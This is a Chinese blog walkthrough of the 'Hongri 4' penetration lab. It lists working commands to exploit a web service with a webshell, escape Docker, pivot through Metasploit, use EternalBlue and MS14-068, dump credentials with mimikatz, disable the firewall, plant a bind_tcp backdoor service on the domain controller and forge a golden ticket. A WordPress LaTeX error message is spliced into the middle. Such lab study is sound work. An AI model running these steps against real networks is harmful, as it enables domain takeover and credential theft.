红日渗透4

信息收集

nmap 扫描端口

nmap 使用

sudo nmap -sS -p  1-65535 -sV 192.168.183.128
-sS 无状态扫描建立连接

sudo nmap -sS -p  1-65535 -sV 192.168.183.128 -oX file.xml
searchsploit --nmap ./file.xml

exp 拿 shell

修改 42966.py 的 payload 为冰蝎马 python 42966.py -u http://xx -p pwn.js

冰蝎进入后 msf 反弹 shell判断处于 docker 内

docker 特权逃逸

提升用户权限

内网横向

获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.183.0/24
开启本地代理:
use auxiliary/server/socks4a
set srvport 2222
exploit
修改配置
/etc/proxychains.conf
socks4 192.168.76.132 2222

msf 扫描主机
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.183.0-255
set threads 5
run
nmap 扫描

太慢了

proxychains4 nmap -sS -Pn 192.168.183.0/24
smb 扫描
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.183.130-132
run

永恒之蓝拿下主机

msf 直接拿下 system 权限,当然也可以其他方式上域用户 CVE-2020-0787 直接提权
使用后门上线
payload windows/meterpreter/bind_tcp注意和windows/x64/meterpreter/bind_tcp

net start netlogon
ipconfig /all 判断存在域-dns
net view /domain 判断存在域
net time /domain 判断主域
netstat -ano 当前网络端口开放
nslookup 域名 追踪来源地址
系统默认常见用户身份:
Domain Admins:域管理员(默认对域控制器有完全控制权)
Domain Computers:域内机器
Domain Controllers:域控制器
Domain Guest:域访客,权限低
Domain Users:域用户
Enterprise Admins:企业系统管理员用户(默认对域控制器有完全控制权)
相关用户收集操作命令:
whoami /all 用户权限
net config workstation 登录信息
net user 本地用户
net localgroup 本地用户组
net user /domain 获取域用户信息
net group /domain 获取域用户组信息
wmic useraccount get /all 涉及域用户详细信息
net group "Domain Admins" /domain 查询域管理员账户
net group "Enterprise Admins" /domain 查询管理员用户组
net group "Domain Controllers" /domain 查询域控制器
本机信息收集
load kiwi
creds_all

mimikatz切换x64
查出明文密码,可以试着开启 rdp 登录但是太麻烦

使用令牌模拟,获取域内用户权限进行信息收集

load incognito
list_tokens -u
impersonate_token DEMO\\douser  

利用ms14-068漏洞

获取不到相关的明文或 HASH,该漏洞不需要密码即可拿下 DC/SYSTEM
只需域内用户账号密码

shell
ms14-068.exe -u douser@demo.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123
//ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址 
ctrl+c
kerberos_ticket_purge
![](https://www.sgxm.tech/wp-content/uploads/2021/12/69ab921c13e2d84be55a6c847d119a10.png)
mimikatz # kerberos::purge         //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list          //查看当前机器凭证
mimikatz # kerberos::ptc TGT_douser@demo.com.ccache

拿下 DC

建立 IPC 链接,只能用主机名

net use \\WIN-ENS2VR5TR3N
dir \\WIN-ENS2VR5TR3N\c
*** QuickLaTeX cannot compile formula:
</code></pre>

利用 sc 关闭防火墙

<pre><code class="">sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\WIN-ENS2VR5TR3N start unablefirewall
</code></pre>

上马

<pre><code class=""> msfvenom -p windows/meterpreter/bind_tcp lport=6666 -f exe > 6666.exe
 upload ./6666.exe C:/
 copy 6666.exe \\WIN-ENS2VR5TR3N\c

*** Error message:
Cannot connect to QuickLaTeX server: cURL error 60: The certificate issuer's certificate has expired. Check your system date and time.
Please make sure your server/PHP settings allow HTTP requests to external resources ("allow_url_fopen", etc.)
These links might help in finding solution:
http://wordpress.org/extend/plugins/core-control/
http://wordpress.org/support/topic/an-unexpected-http-error-occurred-during-the-api-request-on-wordpress-3?replies=37

sc \\WIN-ENS2VR5TR3N create Startup binpath= "C:\6666.exe"
sc \\WIN-ENS2VR5TR3N start Startup
run -j 后台监听

使用 exe 的 sc 断掉后后门进程会挂掉,可以试试 bat 后门?我没试,但是可以上传一个 bat, 创建 sc,这样 sc 结束后门进程不会被关闭

@echo off

@start
"C:\6666.exe" 
@exit

权限维持

获取密码

load kiwi
kiwi_cmd sekurlsa::logonpasswords

开启3389

run post/windows/manage/enable_rdp

msf 开启 socket 代理模块 1111 端口,配置 183 路由,rdp 加代理,拿下

黄金票据

1、域名称
2、域的SID值
3、域的KRBTGT账号的HASH
4、伪造任意用户名

privilege::debug
lsadump::lsa /patch
kerberos::golden /user:administrator /domain:demo.com /sid:xxx/krbtgt:xxx /ticket:ticket.kirbi


图里的 demo.gold 失败了,要用 demo.com

金票放到 win7 上 ,douser 普通域内用户,mimikatz 导入票据


发表评论

邮箱地址不会被公开。 必填项已用*标注